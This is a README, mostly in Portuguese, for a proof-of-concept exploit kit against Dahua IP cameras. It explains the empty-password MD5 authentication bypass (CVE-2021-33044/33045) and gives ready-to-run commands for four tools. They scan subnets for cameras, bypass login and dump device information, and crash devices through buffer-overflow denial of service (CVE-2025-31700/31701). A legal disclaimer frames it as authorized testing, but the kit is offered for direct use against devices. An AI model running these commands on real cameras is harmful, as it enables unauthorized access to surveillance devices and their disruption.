
Kit de pesquisa de CVE para câmeras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ EM DESENVOLVIMENTO — Estes scripts são baseados em detalhes de CVEs publicados e exigem testes adicionais contra dispositivos vulneráveis para confirmar a funcionalidade completa.
Scripts de pesquisa e prova de conceito para quatro vulnerabilidades críticas em câmeras IP Dahua.
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
| CVE | CVSS | Tipo | Status |
|---|---|---|---|
| CVE-2021-33044 | 9.8 CRÍTICA | Bypass de Autenticação | CISA KEV (explorada ativamente) |
| CVE-2021-33045 | 9.8 CRÍTICA | Bypass de Autenticação | CISA KEV (explorada ativamente) |
| CVE-2025-31700 | 8.1 ALTA | Buffer Overflow DoS | Recente (2025) |
| CVE-2025-31701 | 8.1 ALTA | Buffer Overflow DoS | Recente (2025) |
As câmeras Dahua usam autenticação de desafio-resposta em /RPC2_Login:
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← EMPTY password
step2 = MD5("step1:random:step1")
O firmware vulnerável aceita o hash de senha vazia e retorna um token de sessão válido.
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
Portas comuns Dahua: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only
⚠️ AVISO: O script de DoS pode travar o dispositivo alvo.
requests
Todos os outros imports são da biblioteca padrão do Python:
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 EM DESENVOLVIMENTO ATIVO
Estes scripts foram desenvolvidos com base em:
Status dos Testes:
Se você tiver acesso a dispositivos vulneráveis para testes, contribuições e feedback são bem-vindos.
Por favor, relate quaisquer problemas ou falsos positivos.
Licença MIT - Consulte o arquivo LICENSE.
Umair Aziz
GitHub: @umair-aziz025
Apenas para fins educacionais e de pesquisa de segurança autorizada.
| Arquivo | Finalidade | CVEs |
|---|
dahua_scanner.py | Descoberta de rede — encontra câmeras Dahua na sub-rede | Detecção |
dahua_exploit.py | Scanner multi-CVE — testa todas as vulnerabilidades | Todas |
dahua_auth_bypass.py | Bypass de autenticação dedicado com opção --dump | CVE-2021-33044/45 |
dahua_rce.py | Sonda de DoS por estouro de buffer | CVE-2025-31700/01 |